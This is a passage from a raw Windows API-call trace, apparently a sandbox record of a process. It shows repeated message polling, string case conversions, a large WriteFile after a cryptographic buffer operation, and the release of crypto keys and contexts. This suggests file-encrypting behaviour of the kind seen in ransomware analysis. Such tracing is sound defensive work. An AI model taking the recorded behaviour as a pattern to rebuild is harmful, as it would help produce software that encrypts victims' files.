pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xd9f9, dwBufLen=0xda00 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xda00) returned 1 [0100.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.055] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0100.055] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.055] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0100.055] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.055] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.055] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0100.055] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.055] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0100.055] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.055] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.056] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.056] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.057] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.057] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.057] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.057] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.057] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.063] WriteFile (in: hFile=0x458, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0xda00, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0xda00, lpOverlapped=0x0) returned 1 [0100.102] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.104] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.104] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0100.104] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.104] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0100.104] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.104] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.104] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.104] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0100.104] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.104] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0100.104] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0100.104] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa99a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0100.104] CryptDestroyKey (hKey=0x9a4580) returned 1 [0100.105] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.105] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.105] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0100.105] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0100.105] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0100.105] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0100.105] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0100.105] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0100.105] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0100.105] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0100.105] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0100.105] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0100.105] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0100.105] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0100.120] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.120] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0100.120] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.120] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0100.120] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0100.120] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0100.120] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0100.120] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.120] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.120] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.120] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0100.120] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.120] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0100.120] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.120] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.120] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0100.121] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.121] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0100.121] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.121] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.121] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0100.121] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.121] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.121] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0100.121] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.121] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0100.121] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0100.121] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.121] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.121] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.121] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.121] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.121] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.121] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0100.121] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.121] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0100.121] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.121] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.121] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0100.122] CryptReleaseContext (hProv=0x9bebc0, dwFlags=0x0) returned 1 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0100.122] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0100.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0100.122] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.123] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0100.123] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.123] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.123] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0100.123] FreeLibrary (hLibModule=0x76390000) returned 1 [0100.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.123] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0100.123] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0100.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0100.125] CloseHandle (hObject=0x44c) returned 1 [0100.154] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0100.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0100.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0100.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0100.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0100.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0100.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0100.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9808 [0100.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0100.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0100.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0100.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0100.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0100.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0100.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0100.155] CloseHandle (hObject=0x458) returned 1 [0100.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0100.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe880 | out: hHeap=0x2af0000) returned 1 [0100.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0100.158] HeapFree (in: hHeap=0x2af0000, 